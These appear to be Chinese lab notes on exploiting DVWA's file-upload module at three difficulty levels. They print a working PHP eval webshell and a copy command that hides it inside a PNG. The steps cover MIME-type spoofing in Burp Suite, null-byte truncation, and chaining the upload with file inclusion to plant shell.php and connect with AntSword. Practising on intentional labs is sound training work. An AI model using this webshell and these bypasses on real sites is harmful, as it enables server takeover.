low
-
启动dvwa 靶场
-
上传一句话木马<?php @eval($_REQUEST[777]);phpinfo();?>
-
上传成功,文件路径已经给出,访问一下
-
PHP 代码成功运行,尝试蚁剑连接连接成功
medium
-
尝试上传一句话木马
上传失败,提示只能上传JPEG、PNG格式的文件,应该是对文件的类型做了限制 -
查看源代码
此处,对文件的类型和大小做了过滤 -
BP抓个包
将文件类型改为image/png提示上传成功 -
访问一下
-
PHP 代码成功运行,尝试进行蚁剑连接
连接成功
high
-
上传一句话木马,开启BP拦截,抓取数据包
-
文件上传失败,提示只能上传类型为JPEG、PNG的文件
-
修改文件名为1.png ,文件类型为image/png尝试上传
上传失败 -
上传一张正常的图片,查看一下文件上传功能是否正常
-
上传一张正常的图片,能够上传成功,文件上传功能正常
-
使用命令做一张图片木马
copy dvwa.png/b+1.php/a dvwa_1.png -
图片的末尾有一句话木马
-
尝试上传图片木马
上传成功 -
虽然文件已经上传成功,但是不能getshell
找到刚才上传图片木马的数据包
a. 测试后缀名
将文件名改为dvwa.php
上传失败
在将文件名改为dvwa_1.php.png 进行尝试
上传成功
说明对文件的后缀名做了过滤
b. 00截断
将文件名改为dvwa_1.php…png
将前面的 . 给为00
上传失败
- 结合文件包含漏洞来获取shell
a. 来到文件包含模块
b. 包含一下刚才上传的图片木马(注意地址)
包含成功
并且PHP代码已经成功运行,进行蚁剑连接
c. 尝试进行蚁剑连接
蚁剑连不上(GG)
11. 蚁剑连接失败,但是PHP 代码可以执行。
所以尝试使用PHP 代码来生成一个shell 文件,文件内容是一句话木马,然后通过蚁剑来连接shell 文件
a. 上传一个dvwa_shell.png 的图片木马
在文件后面连接PHP 语句
意思为:在当前目录下生成一个shell 文件
上传成功
b. 包含一下图片木马,使图片木马里的PHP 代码能够执行
c. 访问一下新生成的shell.php
d. 尝试蚁剑连接
连接成功